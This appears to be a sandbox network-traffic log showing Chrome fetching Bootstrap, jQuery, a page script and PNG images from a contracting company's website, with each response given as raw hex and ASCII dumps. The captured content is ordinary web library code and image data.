                                              2024-09-27 06:19:43 UTC4112INData Raw: 20 20 20 20 20 20 20 20 20 61 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 63 75 72 72 65 6e 74 32 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6e 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 62 6c 61 63 6b 2d 62 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 28 22 2e 63 75 72 72 65 6e 74 32 22 29 2e 68 61 73 43 6c 61 73 73 28 22 70 61 72 61 6c 6c 61 78 2d 73 65 63 74 69 6f 6e 22 29 29 73 6e 2e 61 64 64 43 6c 61 73 73 28 22 62 6c 61 63 6b 2d 62 67 22 29 3b 20 65 6c 73 65 20 73 6e 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 62 6c 61 63 6b 2d 62 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 24 28 22 2e 73 63 72 6f 6c 6c 2d 69 6e
                                              Data Ascii: a.removeClass("current2"); sn.removeClass("black-bg"); } if ($(".current2").hasClass("parallax-section"))sn.addClass("black-bg"); else sn.removeClass("black-bg"); }); }); $(".scroll-in


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.465325173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:43 UTC632OUTGET /js/bootstrap.bundle.min.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:44 UTC273INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:43 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:20:46 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 78129
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:44 UTC7919INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62
                                              Data Ascii: /*! * Bootstrap v5.1.3 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
                                              2024-09-27 06:19:44 UTC8000INData Raw: 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 57 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 5b 74 5d 7c 7c 74 2e 73 74 61 72 74 73 57 69 74 68 28 22 5f 22 29 7c 7c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 3d 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 24 7b 74 7d 22 60 29 3b 65 5b 74 5d 28 74 68 69 73 29 7d 7d 29 29 7d 7d 52 28 57 2c 22 63 6c 6f 73 65 22 29 2c 67 28 57 29 3b 63 6f 6e 73 74 20 24 3d 27 5b 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 62 75 74 74 6f 6e 22
                                              Data Ascii: eturn this.each((function(){const e=W.getOrCreateInstance(this);if("string"==typeof t){if(void 0===e[t]||t.startsWith("_")||"constructor"===t)throw new TypeError(`No method named "${t}"`);e[t](this)}}))}}R(W,"close"),g(W);const $='[data-bs-toggle="button"
                                              2024-09-27 06:19:44 UTC8000INData Raw: 63 20 63 61 72 6f 75 73 65 6c 49 6e 74 65 72 66 61 63 65 28 74 2c 65 29 7b 63 6f 6e 73 74 20 69 3d 73 74 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 2c 65 29 3b 6c 65 74 7b 5f 63 6f 6e 66 69 67 3a 6e 7d 3d 69 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 6e 3d 7b 2e 2e 2e 6e 2c 2e 2e 2e 65 7d 29 3b 63 6f 6e 73 74 20 73 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 6e 2e 73 6c 69 64 65 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 29 69 2e 74 6f 28 65 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 5b 73 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 4e 6f 20 6d 65 74 68 6f
                                              Data Ascii: c carouselInterface(t,e){const i=st.getOrCreateInstance(t,e);let{_config:n}=i;"object"==typeof e&&(n={...n,...e});const s="string"==typeof e?e:n.slide;if("number"==typeof e)i.to(e);else if("string"==typeof s){if(void 0===i[s])throw new TypeError(`No metho
                                              2024-09-27 06:19:44 UTC8000INData Raw: 5d 2e 69 6e 64 65 78 4f 66 28 6e 2e 77 69 6c 6c 43 68 61 6e 67 65 29 7c 7c 65 26 26 22 66 69 6c 74 65 72 22 3d 3d 3d 6e 2e 77 69 6c 6c 43 68 61 6e 67 65 7c 7c 65 26 26 6e 2e 66 69 6c 74 65 72 26 26 22 6e 6f 6e 65 22 21 3d 3d 6e 2e 66 69 6c 74 65 72 29 72 65 74 75 72 6e 20 69 3b 69 3d 69 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 74 29 7c 7c 65 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 74 29 7b 72 65 74 75 72 6e 5b 22 74 6f 70 22 2c 22 62 6f 74 74 6f 6d 22 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3e 3d 30 3f 22 78 22 3a 22 79 22 7d 76 61 72 20 69 65 3d 4d 61 74 68 2e 6d 61 78 2c 6e 65 3d 4d 61 74 68 2e 6d 69 6e 2c 73 65 3d 4d 61 74 68 2e 72 6f 75 6e 64 3b 66 75 6e 63 74 69 6f 6e 20 6f 65 28 74 2c 65 2c 69 29 7b 72 65 74 75 72 6e 20
                                              Data Ascii: ].indexOf(n.willChange)||e&&"filter"===n.willChange||e&&n.filter&&"none"!==n.filter)return i;i=i.parentNode}return null}(t)||e}function ee(t){return["top","bottom"].indexOf(t)>=0?"x":"y"}var ie=Math.max,ne=Math.min,se=Math.round;function oe(t,e,i){return
                                              2024-09-27 06:19:44 UTC8000INData Raw: 28 21 65 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 5b 6e 5d 2e 5f 73 6b 69 70 29 7b 66 6f 72 28 76 61 72 20 73 3d 69 2e 6d 61 69 6e 41 78 69 73 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 73 7c 7c 73 2c 72 3d 69 2e 61 6c 74 41 78 69 73 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2c 6c 3d 69 2e 66 61 6c 6c 62 61 63 6b 50 6c 61 63 65 6d 65 6e 74 73 2c 63 3d 69 2e 70 61 64 64 69 6e 67 2c 68 3d 69 2e 62 6f 75 6e 64 61 72 79 2c 64 3d 69 2e 72 6f 6f 74 42 6f 75 6e 64 61 72 79 2c 75 3d 69 2e 61 6c 74 42 6f 75 6e 64 61 72 79 2c 66 3d 69 2e 66 6c 69 70 56 61 72 69 61 74 69 6f 6e 73 2c 70 3d 76 6f 69 64 20 30 3d 3d 3d 66 7c 7c 66 2c 6d 3d 69 2e 61 6c 6c 6f 77 65 64 41 75 74 6f 50 6c 61 63 65 6d 65 6e 74 73 2c 67 3d 65 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e
                                              Data Ascii: (!e.modifiersData[n]._skip){for(var s=i.mainAxis,o=void 0===s||s,r=i.altAxis,a=void 0===r||r,l=i.fallbackPlacements,c=i.padding,h=i.boundary,d=i.rootBoundary,u=i.altBoundary,f=i.flipVariations,p=void 0===f||f,m=i.allowedAutoPlacements,g=e.options.placemen
                                              2024-09-27 06:19:44 UTC8000INData Raw: 72 72 6f 77 44 6f 77 6e 22 2c 51 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 41 72 72 6f 77 55 70 7c 41 72 72 6f 77 44 6f 77 6e 7c 45 73 63 61 70 65 22 29 2c 47 65 3d 22 63 6c 69 63 6b 2e 62 73 2e 64 72 6f 70 64 6f 77 6e 2e 64 61 74 61 2d 61 70 69 22 2c 5a 65 3d 22 6b 65 79 64 6f 77 6e 2e 62 73 2e 64 72 6f 70 64 6f 77 6e 2e 64 61 74 61 2d 61 70 69 22 2c 4a 65 3d 22 73 68 6f 77 22 2c 74 69 3d 27 5b 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 5d 27 2c 65 69 3d 22 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 2c 69 69 3d 6d 28 29 3f 22 74 6f 70 2d 65 6e 64 22 3a 22 74 6f 70 2d 73 74 61 72 74 22 2c 6e 69 3d 6d 28 29 3f 22 74 6f 70 2d 73 74 61 72 74 22 3a 22 74 6f 70 2d 65 6e 64 22 2c 73 69 3d 6d 28 29 3f 22 62 6f 74 74 6f 6d 2d 65
                                              Data Ascii: rrowDown",Qe=new RegExp("ArrowUp|ArrowDown|Escape"),Ge="click.bs.dropdown.data-api",Ze="keydown.bs.dropdown.data-api",Je="show",ti='[data-bs-toggle="dropdown"]',ei=".dropdown-menu",ii=m()?"top-end":"top-start",ni=m()?"top-start":"top-end",si=m()?"bottom-e
                                              2024-09-27 06:19:44 UTC8000INData Raw: 65 6d 65 6e 74 28 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 67 69 29 2c 74 68 69 73 2e 5f 65 6d 75 6c 61 74 65 41 6e 69 6d 61 74 69 6f 6e 28 28 28 29 3d 3e 7b 74 68 69 73 2e 64 69 73 70 6f 73 65 28 29 2c 5f 28 74 29 7d 29 29 29 3a 5f 28 74 29 7d 5f 67 65 74 45 6c 65 6d 65 6e 74 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 63 6c 61 73 73 4e 61 6d 65 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 73 41 6e 69 6d 61 74 65 64 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 66 61 64 65 22 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                              Data Ascii: ement().classList.remove(gi),this._emulateAnimation((()=>{this.dispose(),_(t)}))):_(t)}_getElement(){if(!this._element){const t=document.createElement("div");t.className=this._config.className,this._config.isAnimated&&t.classList.add("fade"),this._element
                                              2024-09-27 06:19:44 UTC8000INData Raw: 6c 6c 62 61 63 6b 28 28 28 29 3d 3e 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6d 6f 64 61 6c 22 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 73 63 72 6f 6c 6c 7c 7c 28 6e 65 77 20 66 69 29 2e 72 65 73 65 74 28 29 2c 6a 2e 74 72 69 67 67 65 72 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 71 69 29 7d 29 2c 74 68 69 73 2e 5f 65
                                              Data Ascii: llback((()=>{this._element.setAttribute("aria-hidden",!0),this._element.removeAttribute("aria-modal"),this._element.removeAttribute("role"),this._element.style.visibility="hidden",this._config.scroll||(new fi).reset(),j.trigger(this._element,qi)}),this._e
                                              2024-09-27 06:19:44 UTC8000INData Raw: 41 6e 64 53 65 74 43 6f 6e 74 65 6e 74 28 74 2c 65 2c 69 29 7b 63 6f 6e 73 74 20 6e 3d 56 2e 66 69 6e 64 4f 6e 65 28 69 2c 74 29 3b 65 7c 7c 21 6e 3f 74 68 69 73 2e 73 65 74 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 28 6e 2c 65 29 3a 6e 2e 72 65 6d 6f 76 65 28 29 7d 73 65 74 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 28 74 2c 65 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 74 29 72 65 74 75 72 6e 20 6f 28 65 29 3f 28 65 3d 72 28 65 29 2c 76 6f 69 64 28 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 68 74 6d 6c 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 21 3d 3d 74 26 26 28 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 22 2c 74 2e 61 70 70 65 6e 64 28 65 29 29 3a 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 29 3a 76 6f 69 64 28 74 68 69 73 2e 5f
                                              Data Ascii: AndSetContent(t,e,i){const n=V.findOne(i,t);e||!n?this.setElementContent(n,e):n.remove()}setElementContent(t,e){if(null!==t)return o(e)?(e=r(e),void(this._config.html?e.parentNode!==t&&(t.innerHTML="",t.append(e)):t.textContent=e.textContent)):void(this._
                                              2024-09-27 06:19:44 UTC6210INData Raw: 74 28 29 3b 69 66 28 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 21 3d 3d 65 26 26 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 2c 74 3e 3d 69 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 5f 74 61 72 67 65 74 73 5b 74 68 69 73 2e 5f 74 61 72 67 65 74 73 2e 6c 65 6e 67 74 68 2d 31 5d 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 21 3d 3d 74 26 26 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 28 74 29 7d 65 6c 73 65 7b 69 66 28 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 26 26 74 3c 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 5b 30 5d 26 26 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 5b 30 5d 3e 30 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 3d 6e 75 6c 6c 2c 76 6f 69 64 20 74 68 69 73 2e 5f 63 6c 65 61 72 28
                                              Data Ascii: t();if(this._scrollHeight!==e&&this.refresh(),t>=i){const t=this._targets[this._targets.length-1];this._activeTarget!==t&&this._activate(t)}else{if(this._activeTarget&&t<this._offsets[0]&&this._offsets[0]>0)return this._activeTarget=null,void this._clear(


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.465327173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:44 UTC681OUTGET /images/rlod.png HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:44 UTC259INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:44 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Thu, 12 Jan 2023 18:18:39 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 3429
                                              Connection: close
                                              Content-Type: image/png
                                              2024-09-27 06:19:44 UTC3429INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 16 08 06 00 00 00 c4 b4 6c 3b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                              Data Ascii: PNGIHDRl;pHYsOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.465332173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:44 UTC424OUTGET /images/logo1.png HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:44 UTC260INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:44 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:22:40 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 19094
                                              Connection: close
                                              Content-Type: image/png
                                              2024-09-27 06:19:44 UTC7932INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fd 00 00 00 57 08 06 00 00 00 cf b2 43 74 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                              Data Ascii: PNGIHDRWCtpHYsOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K
                                              2024-09-27 06:19:44 UTC8000INData Raw: 34 ba 8f 65 59 df 71 2d 16 8b 27 25 93 c9 0b 56 59 ec 91 b5 da 54 a9 54 06 e3 f1 f8 3b 1a 94 50 88 10 92 f2 69 bf 39 3b 3b fb 48 03 fb 1b 73 1c c7 6f be 90 50 28 54 0a 85 42 25 45 51 d6 9c 13 84 90 57 39 8e b3 65 c7 8e 1d b0 7b f7 ee f5 f9 f4 c8 34 4b 56 24 fc 48 e0 b4 17 01 9b cd bc 74 2d 7f 36 1c 0e e7 30 c6 8b b0 9c 9d d5 24 84 a8 18 63 09 00 24 58 a3 04 32 a5 54 62 18 e6 5e 4d d3 b2 7e e7 c6 bd e2 07 8f 73 1c f7 68 a1 50 38 20 20 e2 38 0e c4 62 31 8b e3 38 29 97 cb bd be 55 5d 38 86 61 48 20 10 50 2d cb 7a ab 61 18 2d fb 14 89 44 d2 9e 6f 24 00 80 41 08 a9 61 8c 15 68 28 c3 ec 05 71 58 00 78 e8 50 40 6f 18 c6 16 3f ca 27 08 c2 ef 8b c5 e2 39 c3 c3 c3 98 10 32 8c 10 7a 5b 3e 9f bf aa 5a ad 4a 3e cf 92 79 9e 7f 33 00 7c 05 00 40 d7 f5 6d ad 8a 5d e4 f3
                                              Data Ascii: 4eYq-'%VYTT;Pi9;;HsoP(TB%EQW9e{4KV$Ht-60$c$X2Tb^M~shP8 8b18)U]8aH P-za-Do$Aah(qXxP@o?'92z[>ZJ>y3|@m]
                                              2024-09-27 06:19:44 UTC3162INData Raw: 7b 41 c8 3f ac 62 63 e7 10 42 20 1c 0e e7 38 8e 7f 22 97 cb be dc b2 2c 5c 2a 95 7e b1 92 8f 8f 61 98 a9 d9 d9 d9 ea f0 f0 f0 fb 72 d9 2c 1f 08 04 6c 5d d7 7f d8 e0 c6 29 f5 7a fd 96 74 3a fd 62 2f 91 a7 4b 08 c1 c1 60 70 21 16 8b 9d d5 c8 7e 36 6f de 8c 2b 95 ca 4b 10 42 14 63 fc a3 d5 fd e8 ef ef 57 0a 85 42 52 96 e5 45 51 0c 4c 37 e6 50 5c 5a 5a 14 6d db 3e 5f 92 24 93 61 98 ef 19 a6 09 2c cb 42 34 1c 86 b9 d9 79 d0 75 03 78 9e 6f 6f ce 79 ae c4 b6 ed 93 5c d7 45 a2 28 d6 4d c3 5c 77 36 de 95 1a 67 2c cb 4e b5 ba 4e d7 f5 6b 34 4d e3 43 a1 90 e6 ba ee 8f 3d 0a 8d 01 e0 3c 6f b7 96 39 bf b0 f0 ba 54 2a f5 25 ef b9 b8 5a ad 86 28 a5 a0 28 ca 64 2c 16 3d a8 10 86 a1 eb 7d ba 6e 78 2b 05 f8 fe e6 bf 6b 9c ed 05 cf f2 89 44 e2 89 a5 a5 a5 ef d6 eb 75 31 1e
                                              Data Ascii: {A?bcB 8",\*~ar,l])zt:b/K`p!~6o+KBcWBREQL7P\ZZm>_$a,B4yuxooy\E(M\w6g,NNk4MC=<o9T*%Z((d,=}nx+kDu1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.465331173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:44 UTC424OUTGET /js/jquery.min.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:44 UTC273INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:44 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:20:44 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 89475
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:44 UTC7919INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                              Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
